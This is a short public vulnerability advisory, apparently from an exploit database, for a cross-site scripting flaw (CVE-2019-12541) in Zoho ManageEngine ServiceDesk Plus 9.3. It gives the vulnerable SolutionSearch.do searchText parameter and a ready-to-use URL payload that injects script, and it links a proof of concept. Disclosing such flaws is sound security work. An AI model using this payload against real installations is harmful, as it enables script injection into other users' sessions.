# ExploitTitle:ZohoManageEngineServiceDeskPlus9.3Cross-SiteScripting via SolutionSearch.do
# Date:2019-06-04
# ExploitAuthor:TarantulaTeam-VinCSS(a member of Vingroup)
# VendorHomepage: https://www.manageengine.com/products/service-desk
# Version:ZohoManageEngineServiceDeskPlus9.3
# CVE:CVE-2019-12541InformationDescription:An issue was discovered in ZohoManageEngineServiceDeskPlus9.3.There is XSS via the SolutionSearch.do searchText parameter.
Attack vector: domain/SolutionSearch.do?searchText=1'%3balert('XSS')%2f%2f706z8rz68&selectName=SolutionsPoC: https://drive.google.com/file/d/1zXyFpVwAPc0MfcERNmvIdyKLzx0JMA9r/view